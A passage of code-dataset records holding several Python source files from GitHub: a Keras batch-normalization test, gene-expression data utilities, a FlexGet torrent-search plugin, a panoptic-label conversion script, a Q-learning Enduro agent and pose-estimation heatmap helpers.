(norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n #Values calculated by hand\n self.assertAlmostEqual(norm_m0.running_mean, 2.25)\n self.assertAlmostEqual(norm_m0.running_std.eval(), 0.5*np.arange(10).std(), places=2)\n\n out_test = (norm_m0.get_output(train=False) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out_test.mean().eval(), -2.25 / (0.5*np.arange(10).std()),places=2)\n self.assertAlmostEqual(out_test.std().eval(), 0.0, places=2)\n\n norm_m0.input = self.input_3\n out = (norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n def test_mode_1(self):\n norm_m1 = normalization.BatchNormalization((10,), mode=1)\n\n for inp in [self.input_1, self.input_2, self.input_3]:\n norm_m1.input = inp\n out = (norm_m1.get_output(train=True) - norm_m1.beta)/norm_m1.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n if inp.std() > 0.:\n self.assertAlmostEqual(out.std().eval(), 1.0, places=2)\n else:\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n def test_shapes(self):\n \"\"\"\n Test batch normalization with various input shapes\n \"\"\"\n for inp in self.input_shapes:\n norm_m0 = normalization.BatchNormalization(inp.shape, mode=0)\n norm_m0.input = inp\n out = (norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n\n norm_m1 = normalization.BatchNormalization(inp.shape, mode=1)\n norm_m1.input = inp\n out = (norm_m1.get_output(train=True) - norm_m1.beta)/norm_m1.gamma\n\n def test_weight_init(self):\n \"\"\"\n Test weight initialization\n \"\"\"\n\n norm_m1 = normalization.BatchNormalization((10,), mode=1, weights=[np.ones(10),np.ones(10)])\n\n for inp in [self.input_1, self.input_2, self.input_3]:\n norm_m1.input = inp\n out = (norm_m1.get_output(train=True) - np.ones(10))/1.\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n if inp.std() > 0.:\n self.assertAlmostEqual(out.std().eval(), 1.0, places=2)\n else:\n self.assertAlmostEqual(out.std().eval(), 0.0, places=2)\n\n assert_allclose(norm_m1.gamma.eval(),np.ones(10))\n assert_allclose(norm_m1.beta.eval(),np.ones(10))\n\n #Weights must be an iterable of gamma AND beta.\n self.assertRaises(Exception,normalization.BatchNormalization(10,), weights = np.ones(10))\n\n\n def test_config(self):\n norm = normalization.BatchNormalization((10,10), mode=1, epsilon=0.1)\n conf = norm.get_config()\n conf_target = {\"input_shape\": (10,10), \"name\": normalization.BatchNormalization.__name__,\n \"epsilon\":0.1, \"mode\": 1}\n\n self.assertDictEqual(conf, conf_target)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lllcho/CAPTCHA-breaking","sub_path":"keras-master/tests/auto/keras/test_normalization.py","file_name":"test_normalization.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"61"} +{"seq_id":"13619799771","text":"import configparser\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.metrics import make_scorer\nfrom tqdm import tqdm\n\n\ndef read_genes_from_folder(lookup_dir):\n \"\"\"\n Description: Reading gene expression data from specified directory.\n The directory contains one .txt file for each case_id (patient).\n Each .txt file contains the gene expression values (features) for one specific case_id.\n\n :param lookup_dir: Path\n directory containing gene expression data\n :return df_patients: DataFrame, shape = [n_samples, n_features],\n where n_samples is the number of samples and n_features is the number of features.\n - DataFrame.columns: contains the gene names\n - DataFrame.index: contains the case_ids\n :return y: array-like, shape = [n_samples]\n labels (0/1)\n \"\"\"\n X = pd.DataFrame()\n y = []\n for file_name in tqdm(os.listdir(lookup_dir), desc=\">> Reading genes data...\", file=sys.stdout):\n file_path = os.path.join(lookup_dir, file_name)\n with open(file_path) as f:\n patient_df = pd.read_csv(f, sep=\"\\t\", header=None, index_col=0, names=[file_name.replace(\".txt\", \"\")])\n patient_df = pd.DataFrame.transpose(patient_df)\n X = X.append(patient_df)\n y.append(0 if file_name.endswith(\"_0.txt\") else 1)\n\n return X, y\n\n\ndef load_selected_genes(selected_features_dir):\n \"\"\"\n Description: Reading gene expression values (features) of genes selected by feature selection method.\n The directory contains one .npy file for each case_id (patient).\n Each .npy file contains the gene expression values for one specific case_id.\n\n :param selected_features_dir: Path\n directory containing the gene expression data\n :returns X: 2D-numpy array, shape = [n_samples, n_selected_features],\n where n_samples is the number of samples and n_selected_features is the number of selected features\n :return y: array-like, shape = [n_samples]\n labels (0/1)\n :return targets: array-like, shape = [n_samples]\n case_ids\n \"\"\"\n X = []\n y = []\n case_ids = []\n for patient_file in tqdm(os.listdir(selected_features_dir), desc=\">> Reading selected genes...\", file=sys.stdout):\n patient_features = np.load(os.path.join(selected_features_dir, patient_file))\n case_id = os.path.splitext(patient_file)[0]\n target = case_id[-1:]\n case_ids.append(case_id)\n X.append(patient_features)\n y.append(int(target))\n\n X = np.asarray(X)\n return X, y, case_ids\n\n\ndef save_selected_genes(X, extracted_features_dir):\n \"\"\"\n Description: Saving to disk gene expression values of genes selected by feature selection algorithm.\n The directory contains one .npy file for each case_id (patient).\n Each .npy file contains the gene expression values for one specific case_id.\n\n :param X: DataFrame, shape = [n_samples, n_selected_features],\n where n_samples is the number of samples and n_features is the number of selected features.\n :param extracted_features_dir: Path\n directory to save gene expression data\n \"\"\"\n\n for index, row in X.iterrows():\n row = np.asarray(row)\n np.save(os.path.join(extracted_features_dir, index + '.npy'), row)\n\n print(\">> Features saved to \" + str(extracted_features_dir))\n\n\ndef read_config_file(config_file_path, section):\n \"\"\"\n Description: Reading configuration file for genes\n :param config_file_path: Path\n configuration file\n :param section: String\n configuration file section\n :return params: Dictionary\n configuration file parameters\n \"\"\"\n params = {}\n config = configparser.ConfigParser()\n config.read(config_file_path)\n\n params['random_state'] = config.getint('general', 'random_state')\n params['sampling_strategy'] = config.getfloat('general', 'sampling_strategy')\n params['smote'] = config.getboolean('general', 'smote')\n\n if section == 'svm_t_rfe':\n params['alpha'] = config.getfloat('svm_t_rfe', 'alpha')\n params['theta'] = config.getfloat('svm_t_rfe', 'theta')\n params['cv_grid_search_rank'] = config.getint('svm_t_rfe', 'cv_grid_search_rank')\n params['cv_grid_search_acc'] = config.getint('svm_t_rfe', 'cv_grid_search_acc')\n params['cv_outer'] = config.getint('svm_t_rfe', 'cv_outer')\n params['top_ranked'] = config.getint('svm_t_rfe', 'top_ranked')\n params['t_stat_threshold'] = config.getfloat('svm_t_rfe', 't_stat_threshold')\n params['scoring_name'] = config['svm_t_rfe']['scoring']\n params['num_selected_genes'] = config.getint('svm_t_rfe', 'num_selected_genes')\n\n if config['svm_t_rfe']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['svm_t_rfe']['scoring'] == 'matthew_coeff':\n params['scoring'] = make_scorer(metrics.matthews_corrcoef)\n elif config['svm_t_rfe']['scoring'] == 'auc':\n params['scoring'] = make_scorer(metrics.roc_auc_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n if config['svm_t_rfe']['kernel'] == 'linear' or config['svm_t_rfe']['kernel'] == 'rbf':\n params['kernel'] = config['svm_t_rfe']['kernel']\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n elif section == 'svm':\n params['cv_grid_search_acc'] = config.getint('svm', 'cv_grid_search_acc')\n params['scoring_name'] = config['svm']['scoring']\n\n if config['svm']['kernel'] == 'linear' or config['svm']['kernel'] == 'rbf':\n params['kernel'] = config['svm']['kernel']\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n if config['svm']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['svm']['scoring'] == 'recall':\n params['scoring'] = make_scorer(metrics.recall_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n elif section == 'perceptron':\n params['cv_grid_search_acc'] = config.getint('perceptron', 'cv_grid_search_acc')\n params['scoring_name'] = config['perceptron']['scoring']\n\n if config['perceptron']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['perceptron']['scoring'] == 'recall':\n params['scoring'] = make_scorer(metrics.recall_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n elif section == 'sgd_classifier':\n params['cv_grid_search_acc'] = config.getint('sgd_classifier', 'cv_grid_search_acc')\n params['scoring_name'] = config['sgd_classifier']['scoring']\n\n if config['sgd_classifier']['scoring'] == 'accuracy':\n params['scoring'] = make_scorer(metrics.accuracy_score)\n elif config['sgd_classifier']['scoring'] == 'recall':\n params['scoring'] = make_scorer(metrics.recall_score)\n else:\n sys.stderr.write(\"Invalid value for in config file\")\n exit(1)\n\n else:\n sys.stderr.write(\"Invalid value for
in config file\")\n exit(1)\n\n return params\n","repo_name":"Sylelil/Bioinformatics_project","sub_path":"src/genes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"906203473","text":"from __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\n\nimport logging\n\nfrom flexget import plugin\nfrom flexget.entry import Entry\nfrom flexget.event import event\nfrom flexget.utils.requests import RequestException\nfrom flexget.utils.soup import get_soup\nfrom flexget.utils.search import torrent_availability, clean_symbols\nfrom flexget.utils.tools import parse_filesize\n\nlog = logging.getLogger('limetorrents')\n\nclass Limetorrents(object):\n \"\"\"\n Limetorrents search plugin.\n \"\"\"\n\n schema = {\n 'oneOf': [\n {'type': 'boolean'},\n {\n 'type': 'object',\n 'properties': {\n 'category': {'type': 'string', 'enum': ['all', 'anime', 'applications', 'games', 'movies', 'music',\n 'tv', 'other'], 'default': 'all'},\n 'order_by': {'type': 'string', 'enum': ['date', 'seeds'], 'default': 'date'}\n },\n 'additionalProperties': False\n }\n ]\n }\n\n base_url = 'https://www.limetorrents.cc/'\n errors = False\n\n @plugin.internet(log)\n def search(self, task, entry, config):\n \"\"\"\n Search for entries on Limetorrents\n \"\"\"\n\n if not isinstance(config, dict):\n config = {'category': config}\n\n order_by = ''\n if isinstance(config.get('order_by'), str):\n if config['order_by'] != 'date':\n order_by = '{0}/1'.format(config['order_by'])\n\n category = 'all'\n if isinstance(config.get('category'), str):\n category = '{0}'.format(config['category'])\n\n entries = set()\n\n for search_string in entry.get('search_strings', [entry['title']]):\n # No special characters - use dashes instead of %20\n cleaned_search_string = clean_symbols(search_string).replace(' ', '-')\n\n query = 'search/{0}/{1}/{2}'.format(category, cleaned_search_string.encode('utf8'), order_by)\n log.debug('Using search: %s; category: %s; ordering: %s', cleaned_search_string, category, order_by or 'default')\n try:\n page = task.requests.get(self.base_url + query)\n log.debug('requesting: %s', page.url)\n except RequestException as e:\n log.error('Limetorrents request failed: %s', e)\n continue\n\n soup = get_soup(page.content)\n if soup.find('a', attrs={'class': 'csprite_dl14'}) is not None:\n for link in soup.findAll('a', attrs={'class': 'csprite_dl14'}):\n\n row = link.find_parent('tr')\n info_url = str(link.get('href'))\n\n # Get the title from the URL as it's complete versus the actual Title text which gets cut off\n title = str(link.next_sibling.get('href'))\n title = title[:title.rfind('-torrent')].replace('-', ' ')\n title = title[1:]\n\n data = row.findAll('td', attrs={'class': 'tdnormal'})\n size = str(data[1].text).replace(',', '')\n\n seeds = int(row.find('td', attrs={'class': 'tdseed'}).text.replace(',', ''))\n leeches = int(row.find('td', attrs={'class': 'tdleech'}).text.replace(',', ''))\n\n size = parse_filesize(size)\n\n e = Entry()\n\n e['url'] = info_url\n e['title'] = title\n e['torrent_seeds'] = seeds\n e['torrent_leeches'] = leeches\n e['search_sort'] = torrent_availability(e['torrent_seeds'], e['torrent_leeches'])\n e['content_size'] = size\n\n entries.add(e)\n\n return entries\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(Limetorrents, 'limetorrents', interfaces=['search'], api_ver=2)\n","repo_name":"bragatrosco/flexget","sub_path":"lib/python2.7/site-packages/flexget/plugins/sites/limetorrents.py","file_name":"limetorrents.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18334815693","text":"import datetime\nimport json\nimport os, sys\nimport os.path as osp\nfrom PIL import Image\nimport numpy as np\nsys.path.append('../')\nfrom city_default import CATEGORIES, INFO, LICENSES\nimport argparse\nimport shutil\nimport time\nimport multiprocessing\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--mode', type=str, default='val', help='train/val/test')\nparser.add_argument('--root_dir', type=str, default='data/city_ext/', help='root directory')\nargs = parser.parse_args()\n\nMODE = args.mode\nROOT_DIR = args.root_dir\nSEMANTIC_DIR = os.path.join(ROOT_DIR, MODE, 'cls')\nINSTANCE_DIR = os.path.join(ROOT_DIR, MODE, 'inst')\nLABELMAP_DIR = os.path.join(ROOT_DIR, MODE, 'labelmap')\nos.makedirs(LABELMAP_DIR, exist_ok=True)\nPANOPTIC_DIR = os.path.join(ROOT_DIR, MODE, 'panoptic_inst')\nos.makedirs(PANOPTIC_DIR, exist_ok=True)\n\n####\nVOID = 255\nID2CATINFO = {x['id']:x for x in CATEGORIES}\n\ndef panoptic_single_core(proc_id, sem_files, inst_files, id_converter, ori2fcn):\n for sem_file, inst_file in zip(sem_files, inst_files):\n pan_map, label_map = sem_inst2pan(sem_file, inst_file, id_converter, ori2fcn)\n Image.fromarray(pan_map).save(\n os.path.join(PANOPTIC_DIR, sem_file.split('/')[-1]))\n Image.fromarray(label_map).save(\n os.path.join(LABELMAP_DIR, sem_file.split('/')[-1]))\n\n# convert into Cityscapes-style instanceID maps\ndef sem_inst2pan(sem_file, inst_file, id_converter, ori2fcn):\n color_map = np.array(Image.open(sem_file), dtype=np.uint32)[:,:,:3] # 3 channel\n sem_map = color_map[:,:,0] + \\\n color_map[:,:,1]*256 + \\\n color_map[:,:,2]*256*256 # 1 channel\n \n inst_map = np.array(Image.open(inst_file))\n pan_map = np.ones((sem_map.shape[0], sem_map.shape[1]), dtype=np.uint32)*VOID\n label_map = np.ones((sem_map.shape[0], sem_map.shape[1]), dtype=np.uint8)*VOID\n\n sem_ids = np.unique(sem_map)\n inst_ids = np.unique(inst_map)\n\n # Stuff Classes \n for sem_id in sem_ids:\n if sem_id not in id_converter:\n continue\n fcn_id = id_converter[sem_id]\n mask = sem_map == sem_id\n label_map[mask] = fcn_id\n # Dont include Things classes in pan_map.\n if ID2CATINFO[fcn_id]['isthing'] == 1:\n continue\n pan_map[mask] = fcn_id\n\n # Things Classes\n for inst_id in inst_ids:\n #### if stuff classes < 1000, skip\n if inst_id < 1000:\n continue\n obj_mask = inst_map == inst_id\n sem_id, cnt = np.unique(sem_map[obj_mask], return_counts=True)\n sem_id = sem_id[np.argmax(cnt)]\n if sem_id not in id_converter:\n continue\n # Skip the stuff classes\n fcn_id = id_converter[sem_id]\n obj_id = inst_id % 1000 # NOTE: obj_id can be ZERO !\n # Filter Stuff classes\n if ID2CATINFO[fcn_id]['isthing'] == 0:\n continue\n pan_map[obj_mask] = fcn_id*1000 + obj_id\n\n return pan_map.astype(np.uint32), label_map.astype(np.uint8)\n\ndef panoptic_multi_core(sem_files, inst_files, id_converter, ori2fcn):\n cpu_num = multiprocessing.cpu_count()//2\n sem_split = np.array_split(list(sem_files), cpu_num)\n inst_split = np.array_split(list(inst_files), cpu_num)\n assert(len(sem_split) == len(inst_split))\n print(\"Number of cores: %d, images per core: %d\"%\n (cpu_num, len(sem_split[0])))\n workers = multiprocessing.Pool(processes=cpu_num)\n processes = []\n\n for proc_id, (sem_part, inst_part) in enumerate(zip(sem_split, inst_split)):\n workers.apply_async(panoptic_single_core,\n (proc_id, sem_part, inst_part, id_converter, ori2fcn))\n workers.close()\n workers.join()\n\n\ndef main():\n \n id_converter = {x['color'][0]+x['color'][1]*256+x['color'][2]*256*256:x['id'] for x in CATEGORIES}\n ori2fcn = {x['ori_id'] : x['id'] for x in CATEGORIES}\n # panoptic video annotations\n start_pano = time.time()\n print('==> %s/labelmap/, %s/panoptic_inst/ ...'%(MODE, MODE)) \n # merge semantic segmentation and instance id map into panoptic format\n sem_files = [osp.join(SEMANTIC_DIR,x) for x in os.listdir(SEMANTIC_DIR) if '.png' in x]\n sem_files.sort()\n inst_files = [osp.join(INSTANCE_DIR,x) for x in os.listdir(INSTANCE_DIR) if '.png' in x]\n inst_files.sort()\n if not (len(sem_files) == len(inst_files)):\n raise ValueError('len semfiles != len inst_files')\n panoptic_multi_core(sem_files, inst_files, id_converter, ori2fcn) \n\nif __name__=='__main__':\n main()","repo_name":"mcahny/vps","sub_path":"prepare_data/create_panoptic_labels.py","file_name":"create_panoptic_labels.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":300,"dataset":"github-code","pt":"61"} +{"seq_id":"33623866476","text":"import cv2\nfrom enduro.agent import Agent\nfrom enduro.action import Action\nfrom enduro.state import EnvironmentState\nimport numpy as np\nfrom collections import defaultdict\nimport dill as pickle\n\n\nclass QAgent(Agent):\n def __init__(self, alpha = 0.01, gamma = 0.9, epsilon = 0.01):\n super(QAgent, self).__init__()\n\n self.total_reward = 0\n self.alpha = alpha\n self.gamma = gamma\n self.e = epsilon\n self.policy = defaultdict(lambda: Action.ACCELERATE)\n self.q = defaultdict(float)\n self.prev_state = None\n self.curr_state = None\n self.last_reward = None\n self.last_action = None\n\n def initialise(self, grid):\n \"\"\" Called at the beginning of an episode\n \"\"\"\n self.total_reward = 0\n self.prev_state = None\n self.curr_state = None\n self.sense(grid)\n self.last_reward = None\n self.last_action = None\n\n if not self.learning:\n cv2.imshow(\"Enduro\", self._image)\n cv2.imshow(\"Environment Grid\", EnvironmentState.draw(grid))\n with open('policy.p', 'rb') as handle:\n self.policy = pickle.load(handle)\n\n\n def act(self):\n\n if self.learning:\n action_val = {}\n\n for a in self.getActionsSet():\n action_val[a] = self.q[(self.curr_state, a)]\n a_max = max(action_val, key=action_val.get)\n\n self.policy[self.curr_state] = a_max\n action = np.random.choice([a_max, np.random.choice(self.getActionsSet())], p=[1-self.e, self.e])\n\n else:\n action = self.policy[self.curr_state]\n\n self.last_action = action\n self.last_reward = self.move(action)\n self.total_reward += self.last_reward\n\n def sense(self, grid):\n \"\"\" Constructs the next state from sensory signals.\n\n gird -- 2-dimensional numpy array containing the latest grid\n representation of the environment\n \"\"\"\n self.prev_state = self.curr_state\n\n position2 = np.where(grid == 2)\n x2 = position2[1][0]\n position1 = np.where(grid == 1)\n x1_1 = None\n y1_1 = None\n x1_2 = None\n y1_2 = None\n dist = None\n\n for x, y in zip(position1[1], position1[0]):\n if (dist is None) or abs(x - x2) + y < dist:\n x1_1 = x\n y1_1 = y\n dist = max(abs(x - x2) - 1, 0) + y\n\n x1_1 = -1 if x1_1 is None else -1 if dist > 9 or abs(x1_1 - x2) > 2 else x1_1\n dist = None\n for x, y in zip(position1[1], position1[0]):\n if (x != x1_1 or y != y1_1) and ((dist is None) or abs(x - x2) + y < dist):\n x1_2 = x\n y1_2 = y\n dist = max(abs(x - x2) - 1, 0) + y\n x1_2 = -1 if x1_2 is None else -1 if dist > 9 or abs(x1_2 - x2) > 2 else x1_2\n a = 100 if x1_1 == -1 else x2 - x1_1\n b = 100 if x1_2 == -1 else x2 - x1_2\n self.curr_state = (a, b, x2 >= 7, x2 <= 2)\n\n if not self.learning:\n # Visualise the environment grid\n cv2.imshow(\"Environment Grid\", EnvironmentState.draw(grid))\n\n def learn(self):\n \"\"\" Performs the learning procudre. It is called after act() and\n sense() so you have access to the latest tuple (s, s', a, r).\n \"\"\"\n vals = []\n for a in self.getActionsSet():\n vals.append(self.q[(self.curr_state, a)])\n val_max = max(vals)\n\n self.q[(self.prev_state, self.last_action)] = self.q[(self.prev_state, self.last_action)] + \\\n self.alpha * (self.last_reward + self.gamma * val_max - self.q[(self.prev_state, self.last_action)])\n\n\n def callback(self, episode, iteration):\n \"\"\" Called at the end of each timestep for reporting/debugging purposes.\n \"\"\"\n print(\"{0}/{1}: {2}\".format(episode, iteration, self.total_reward))\n # Show the game frame only if not learning\n if self.learning:\n if iteration == 6500:\n with open('policy.p', 'wb') as handle:\n pickle.dump(self.policy, handle, protocol=pickle.HIGHEST_PROTOCOL)\n else:\n cv2.imshow(\"Enduro\", self._image)\n cv2.waitKey(40)\n\nif __name__ == \"__main__\":\n a = QAgent()\n a.run(True, episodes=500, draw=False)\n print('Total reward: ' + str(a.total_reward))\n","repo_name":"hakobtam/q-learning","sub_path":"q_agent.py","file_name":"q_agent.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34986687663","text":"import os\nimport shutil\n\ndef already_exists(to_folder,type=\"dir\",phase_flag=3):\n if type == \"dir\":\n if os.path.isdir(to_folder):\n if input(\"Caution! \"+ to_folder+\" directory already exists. still want to create? (y/n)\") != \"y\":\n print (\"directory not created.\")\n return True\n else:\n shutil.rmtree(to_folder)\n # In the third phase (phase_flag=3) folders need to be created for iTracker algorithm\n # in the first phase, folder for extracted images and eyes need to be created\n os.makedirs(to_folder,mode=0o744,exist_ok=True) #create folder for extracted images or eyes\n # or numbered folder for iTracker algorithm\n if (phase_flag==3):\n os.makedirs(to_folder+\"/tabFace\",mode=0o744,exist_ok=True) #create face folder within it\n os.makedirs(to_folder+\"/tabLeftEye\",mode=0o744,exist_ok=True) #create left eye folder within it\n os.makedirs(to_folder+\"/tabRightEye\",mode=0o744,exist_ok=True) #create right eye folder within it\n return False\n","repo_name":"rahulbishain/Preferential-Looking","sub_path":"code/checkExistence.py","file_name":"checkExistence.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70842088834","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\nimport cv2\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nfrom matplotlib.animation import FuncAnimation\n\n\ndef img_scale(img, scale):\n \"\"\"\n Resize a image by s scaler in both x and y directions.\n\n :param img: input image\n :param scale: scale factor, new image side length / raw image side length\n :return: the scaled image\n \"\"\"\n return cv2.resize(img, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR)\n\n\ndef hm_local_interp_bilinear(src, scale, center, area_size=10):\n \"\"\"\n Heatmap interpolation using a local bilinear method.\n Reference website: https://zhuanlan.zhihu.com/p/49832048\n\n :param src: input heatmap\n :param scale: scale factor, new image side length / raw image side length\n :param center: coordinate of the local center in the heatmap, [row, column]\n :param area_size: side length of local area in the interpolated heatmap\n :return: the destination heatmap with local area being interpolated\n \"\"\"\n src_h, src_w = src.shape[:]\n dst_h, dst_w = [s * scale for s in src.shape[:]]\n y, x = [c * scale for c in center]\n dst = np.zeros((dst_h, dst_w))\n for dst_y in range(max(y - area_size // 2, 0), min(y + int(np.ceil(area_size / 2)), dst_h)):\n for dst_x in range(max(x - area_size // 2, 0), min(x + int(np.ceil(area_size / 2)), dst_w)):\n # pixel alignment\n # src_x = dst_x / 8\n # src_y = dst_y / 8\n # center alignment\n src_x = (dst_x + 0.5) / scale - 0.5\n src_y = (dst_y + 0.5) / scale - 0.5\n src_x_0 = int(src_x)\n src_y_0 = int(src_y)\n src_x_1 = min(src_x_0 + 1, src_w - 1)\n src_y_1 = min(src_y_0 + 1, src_h - 1)\n\n value0 = (src_x_1 - src_x) * src[src_y_0, src_x_0] + (src_x - src_x_0) * src[src_y_0, src_x_1]\n value1 = (src_x_1 - src_x) * src[src_y_1, src_x_0] + (src_x - src_x_0) * src[src_y_1, src_x_1]\n dst[dst_y, dst_x] = (src_y_1 - src_y) * value0 + (src_y - src_y_0) * value1\n return dst\n\n\ndef hm_pt_interp_bilinear(src, scale, point):\n \"\"\"\n Determine the value of one desired point by bilinear interpolation.\n\n :param src: input heatmap\n :param scale: scale factor, input box side length / heatmap side length\n :param point: position of the desired point in input box, [row, column]\n :return: the value of the desired point\n \"\"\"\n src_h, src_w = src.shape[:]\n dst_y, dst_x = point\n src_x = (dst_x + 0.5) / scale - 0.5\n src_y = (dst_y + 0.5) / scale - 0.5\n src_x_0 = int(src_x)\n src_y_0 = int(src_y)\n src_x_1 = min(src_x_0 + 1, src_w - 1)\n src_y_1 = min(src_y_0 + 1, src_h - 1)\n\n value0 = (src_x_1 - src_x) * src[src_y_0, src_x_0] + (src_x - src_x_0) * src[src_y_0, src_x_1]\n value1 = (src_x_1 - src_x) * src[src_y_1, src_x_0] + (src_x - src_x_0) * src[src_y_1, src_x_1]\n dst_val = (src_y_1 - src_y) * value0 + (src_y - src_y_0) * value1\n return dst_val\n\n\ndef img_padding(img, box_size, color='black'):\n \"\"\"\n Given the input image and side length of the box, put the image into the center of the box.\n\n :param img: the input color image, whose longer side is equal to box size\n :param box_size: the side length of the square box\n :param color: indicating the padding area color\n :return: the padded image\n \"\"\"\n h, w = img.shape[:2]\n offset_x, offset_y = 0, 0\n if color == 'black':\n pad_color = [0, 0, 0]\n elif color == 'grey':\n pad_color = [128, 128, 128]\n img_padded = np.ones((box_size, box_size, 3), dtype=np.uint8) * np.array(pad_color, dtype=np.uint8)\n if h > w:\n offset_x = box_size // 2 - w // 2\n img_padded[:, offset_x: box_size // 2 + int(np.ceil(w / 2)), :] = img\n else: # h <= w\n offset_y = box_size // 2 - h // 2\n img_padded[offset_y: box_size // 2 + int(np.ceil(h / 2)), :, :] = img\n return img_padded, [offset_x, offset_y]\n\n\ndef img_scale_squarify(img, box_size):\n \"\"\"\n To scale and squarify the input image into a square box with fixed size.\n\n :param img: the input color image\n :param box_size: the length of the square box\n :return: box image, scaler and offsets\n \"\"\"\n h, w = img.shape[:2]\n scaler = box_size / max(h, w)\n img_scaled = img_scale(img, scaler)\n img_padded, [offset_x, offset_y] = img_padding(img_scaled, box_size)\n assert img_padded.shape == (box_size, box_size, 3), 'padded image shape invalid'\n return img_padded, scaler, [offset_x, offset_y]\n\n\ndef img_scale_padding(img, scaler, box_size, color='black'):\n \"\"\"\n For a box image, scale down it and then pad the former area.\n\n :param img: the input box image\n :param scaler: scale factor, new image side length / raw image side length, < 1\n :param box_size: side length of the square box\n :param color: the padding area color\n \"\"\"\n img_scaled = img_scale(img, scaler)\n if color == 'black':\n pad_color = (0, 0, 0)\n elif color == 'grey':\n pad_color = (128, 128, 128)\n pad_h = (box_size - img_scaled.shape[0]) // 2\n pad_w = (box_size - img_scaled.shape[1]) // 2\n pad_h_offset = (box_size - img_scaled.shape[0]) % 2\n pad_w_offset = (box_size - img_scaled.shape[1]) % 2\n img_scale_padded = np.pad(img_scaled,\n ((pad_w, pad_w + pad_w_offset),\n (pad_h, pad_h + pad_h_offset),\n (0, 0)),\n mode='constant',\n constant_values=(\n (pad_color[0], pad_color[0]),\n (pad_color[1], pad_color[1]),\n (pad_color[2], pad_color[2])))\n return img_scale_padded\n\n\ndef extract_2d_joints(heatmaps, box_size, hm_factor):\n \"\"\"\n Rescale the heatmap to input box size, then extract the coordinates for every joint.\n\n :param heatmaps: the input heatmaps\n :param box_size: the side length of the input box\n :param hm_factor: heatmap factor, indicating box size / heatmap size\n :return: a 2D array with [joints_num, 2], each row of which means [row, column] coordinates of corresponding joint\n \"\"\"\n joints_2d = np.zeros((heatmaps.shape[2], 2))\n for joint_num in range(heatmaps.shape[2]):\n # joint_coord_1 = np.unravel_index(np.argmax(heatmaps[:, :, joint_num]),\n # (box_size // hm_factor, box_size // hm_factor))\n # heatmap_scaled = hm_local_interp_bilinear(heatmaps[:, :, joint_num], hm_factor, joint_coord_1)\n # joint_coord_2 = np.unravel_index(np.argmax(heatmap_scaled), (box_size, box_size))\n # joints_2d[joint_num, :] = joint_coord_2\n heatmap_scaled = cv2.resize(heatmaps[:, :, joint_num], (0, 0), \n fx=hm_factor, fy=hm_factor, \n interpolation=cv2.INTER_LINEAR)\n joint_coord = np.unravel_index(np.argmax(heatmap_scaled), \n (box_size, box_size))\n joints_2d[joint_num, :] = joint_coord\n return joints_2d\n\n\ndef extract_3d_joints(joints_2d, x_hm, y_hm, z_hm, hm_factor):\n \"\"\"\n Extract 3D coordinates of each joint according to its 2D coordinates.\n\n :param joints_2d: 2D array with [joints_num, 2], containing 2D coordinates the joints\n :param x_hm: x coordinate heatmaps\n :param y_hm: y coordinate heatmaps\n :param z_hm: z coordinate heatmaps\n :param hm_factor: heatmap factor, indicating box size / heatmap size\n :return: a 3D array with [joints_num, 3], each row of which contains [x, y, z] coordinates of corresponding joint\n\n Notation:\n x direction: left --> right\n y direction: up --> down\n z direction: nearer --> farther\n \"\"\"\n scaler = 100 # scaler=100 -> mm unit; scaler=10 -> cm unit\n joints_3d = np.zeros((x_hm.shape[2], 3), dtype=np.float32)\n for joint_num in range(x_hm.shape[2]):\n # coord_2d_h, coord_2d_w = joints_2d[joint_num][:]\n # coord_3d_h = coord_2d_h\n # coord_3d_w = coord_2d_w\n # x_hm_scaled = img_scale(x_hm, hm_factor)\n # y_hm_scaled = img_scale(y_hm, hm_factor)\n # z_hm_scaled = img_scale(z_hm, hm_factor)\n # joint_x = x_hm_scaled[coord_3d_h, coord_3d_w, joint_num] * scaler\n # joint_y = y_hm_scaled[coord_3d_h, coord_3d_w, joint_num] * scaler\n # joint_z = z_hm_scaled[coord_3d_h, coord_3d_w, joint_num] * 